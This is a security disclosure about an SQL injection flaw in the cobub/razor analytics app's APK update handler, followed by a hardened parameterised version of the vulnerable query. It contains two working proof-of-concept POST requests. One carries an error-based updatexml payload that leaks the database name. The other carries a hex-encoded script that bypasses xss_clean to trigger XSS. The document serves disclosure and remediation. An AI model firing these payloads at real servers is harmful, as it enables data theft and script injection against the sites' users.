// ChannelModel::updateapk as reported: $updateurl, $description, $versionid and $date
// are interpolated straight into the SQL string, with no escaping and no query binding.
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date'
where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
POC (assume there exists a product with an ID of 1):
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"
1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
XSS can also be triggered through manipulated error messages.
Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"
1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--
Hi, I want to report a SQLi vulnerability.
In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187, $description is controlled by users and has few restrictions on its format. In the ChannelModel::updateapk method, $description is inserted into SQL directly: https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482
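As an added example (not code from the cobub/razor repository), the same update written with CodeIgniter's query bindings, so that the description, version and URL values are passed as bound parameters instead of being spliced into the SQL string. The class and method names and the validation rules are assumptions; `$this->db->query($sql, $binds)`, `dbprefix()` and `affected_rows()` are the framework's own API.

```php
<?php
// Added example, not the project's code. Hardened counterpart of the
// updateapk statement: every user-controlled value is a bound parameter.
// Class/method names and the validation rules below are assumed.
class ChannelModelHardened extends CI_Model
{
    // Returns the number of rows changed, or false when the input is rejected.
    public function updateapk_bound($cp_id, $userid, $updateurl, $description, $versionid, $date)
    {
        // Identifiers must be plain integers before they reach the WHERE clause.
        if (!ctype_digit((string) $cp_id) || !ctype_digit((string) $userid)) {
            return false;
        }
        // A version such as "1.4.0" is digits and dots only; anything else is rejected.
        if (!preg_match('/^\d+(\.\d+){0,3}$/', (string) $versionid)) {
            return false;
        }
        // Only http(s) URLs are accepted for the update location.
        if (!preg_match('#^https?://#i', (string) $updateurl)) {
            return false;
        }

        // Each ? is replaced by the driver-escaped value of the matching bind,
        // so a quote inside $description can no longer close the string literal
        // and the updatexml(...) payload is stored as inert text.
        $sql = "UPDATE " . $this->db->dbprefix('channel_product')
             . " SET updateurl = ?, description = ?, version = ?, date = ?"
             . " WHERE cp_id = ? AND user_id = ?";
        $binds = array(
            $updateurl,
            (string) $description,
            $versionid,
            $date,
            (int) $cp_id,
            (int) $userid,
        );

        $this->db->query($sql, $binds);
        return $this->db->affected_rows();
    }
}
```

With `$db['default']['db_debug'] = FALSE;` in application/config/database.php, MySQL error text (which the updatexml payloads above rely on to surface data) is no longer rendered into the response. The stored description should still be escaped at output time with `html_escape()` rather than relying on `xss_clean` at input, since the hex-encoded form above shows why input filtering alone does not hold.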